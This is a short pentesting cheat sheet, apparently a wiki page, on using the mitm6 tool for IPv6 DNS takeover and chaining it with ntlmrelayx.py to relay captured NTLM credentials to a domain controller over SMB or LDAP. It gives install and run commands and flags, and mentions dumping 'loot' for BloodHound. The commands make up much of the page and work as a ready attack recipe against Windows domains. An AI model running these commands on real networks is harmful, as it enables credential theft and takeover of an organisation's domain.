Page cover image

mitm6

Installation

$ git clone https://github.com/fox-it/mitm6.git

$ cd mitm6

$ pip install .

$ mitm6 -d <domain>

USE WITH NTLMRELAYX

Notice the IPv6 address as a DNS server. Now the real vulnerability is that Windows prefers IPv6 over IPv4, meaning I now control DNS. So now we leverage the fact that we control DNS with spoofing WPAD answers again via ntlmrelayx.py. I wrote a guide on how to set it up here. With mitm6 running in one window, open another and run ntlmrelayx.py.

$ ntlmrelayx.py -wh <Attacker IP> -t smb://<Domain Controller>/

OR

$ ntlmrelayx.py -t ldap://<IP of DC>/

-wh: Server hosting WPAD file (Attacker’s IP)

-t: Target (You cannot relay credentials to the same device that you’re spoofing)

WIth the second command, it can dump loot which can be used to run up bloodhound!

Last updated